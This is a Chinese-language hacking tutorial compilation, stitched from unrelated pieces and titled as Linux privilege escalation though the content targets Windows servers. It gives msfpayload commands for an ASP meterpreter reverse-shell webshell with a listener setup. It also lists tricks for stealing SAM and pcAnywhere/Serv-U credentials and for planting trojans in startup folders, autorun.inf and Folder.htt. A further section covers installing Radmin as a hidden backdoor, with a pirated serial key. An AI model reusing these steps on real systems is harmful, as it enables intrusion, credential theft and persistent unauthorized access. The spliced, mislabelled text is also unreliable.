利用Metasploit进行Linux提权 本文所涉及的方法只能在已授权的机器上做测试。Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用。下面是具体的利用方法。我们可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:产生webshellmsfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp然后将此webshell上传到服务器(这个步骤要有上传权限。)然后启动msfconsole输入use exploit/multi/handler,set PAYLOAD windows/meterpreter/reverse_tcp(这里的payload要和前边的msfpayload所使用的一样。)set LHOST your_ipexploit然后访问webshell的url,这里使用curl 访问curl http://host/webshell.asp ,如果exploit执行成功的话就可以看到msfconsole中有返回meterpreter shell。但是我使用netbox 搭建asp环境老是执行出错,希望读者在实际验证不出错后再使用。这里产生的是asp的webshell 也
c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere 密码,登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RA V\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM 错 CAcls命令 FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的权限提升21大法! 以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过
玩过4899端口入侵的一定不陌生Radmin远控吧,这是一款正向主动型远程控制软件,可以说是一种正当的合法远控,多用于公司内部使用,而灰鸽子这样的反向被动型非合法远控。相信大家只是通过4899端口抓鸡仅仅接触了Radmin 远控,其实Radmin深度研究下会发现很有趣的,它也能辅助我们进行服务器的提权。Radmin远控包括有服务端与客户端两部分。服务端只需要r_server.exe与admdll.dll两个程序,客户端只有一个程序进行连接,这个程序是Radmin.exe。服务端有了r_server+admDll.dll这两个远程控制已经完全足够了,而且最让大家开心的是这两个服务端是本身没有病毒的,下面我直接发一张现在给大家用360杀毒扫描出来的扫描结果,顺便我也把客户端radmin.exe三个文件一起扫描一下给大家看一下。 Radmin客户端与服务端三个文件的下载地址:https://www.doczj.com/doc/182749718.html,/c0n9aap69f 大家看到肯定很开心吧,服务端和客户端居然都是没毒,那是因为这是一种合法远控,这样的话我们的免杀话题就不用再去扯了,我们最快的方法是在拿下Webshell或者CMDshell的时候,可以直接将Radmin远控的服务端通过文件上传或者FTP命令传到对方的电脑上,然后用命令进行安装,当然我们后面会讲到自动安装exe程序的制作,更方便我们提权,当服务器安装后,我们知道服务器IP直接用Radmin客户端进行连接,此时我们就可以进行对服务器的操作了。 一、服务端的图形界面安装法。 1.(为了提现radmin的安装技巧,我将上方r_server中文版替换成了英文版的!如果中文版也没什么学习意思了,大家都会!) 将服务端两个文件r_server3.exe+Admdll.dll放入到C盘(建议C盘方便),这时候我们需要进入打开CMD切换到C盘,输入命令r_server /setup 此时将弹出咱们的Radmin图像安装界面,点击“Enter reg code”输入咱们的Sn 序列号注册该版本。 sn=08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GV MIybWomK6rNwoj8mYy8LXRFi23 注册成功后"Enter reg code" 按钮将不存在,此时点击“Install service” 2.之后点击"Set password"进行密码设置,设置密码数必须8位以上,我就是设置969769906 我的Q号为密码吧,大家都知道4899空口令探测器专门探测空密码,如果不设置密码容易被黑客抓鸡,输入密码后想连接服务端就需要输入密码了。 3.下面简单的设置下,点击软件的Options,其中我们现在线设置其端口,Radmin默认端口为4899,我们这里设置8888端口(设置少用的端口避免端口冲突),再设置一个隐藏